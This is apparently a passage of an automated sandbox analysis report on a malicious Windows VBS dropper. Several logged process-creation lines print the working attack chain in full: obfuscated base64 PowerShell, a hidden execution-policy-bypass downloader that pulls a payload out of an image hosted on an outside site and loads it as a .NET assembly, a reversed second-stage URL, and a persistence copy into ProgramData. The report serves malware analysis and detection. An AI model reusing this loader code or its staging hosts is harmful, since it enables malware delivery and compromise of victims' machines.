      Source: wscript.exe, 00000000.00000003.1725442998.00000225658F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.00000225658FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
      Source: wscript.exe, 00000000.00000002.1730762210.0000022565CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\gTreZD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
      Source: Yara matchFile source: amsi64_7476.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'cognitivo','regasm',''))} }"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'cognitivo','regasm',''))} }"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
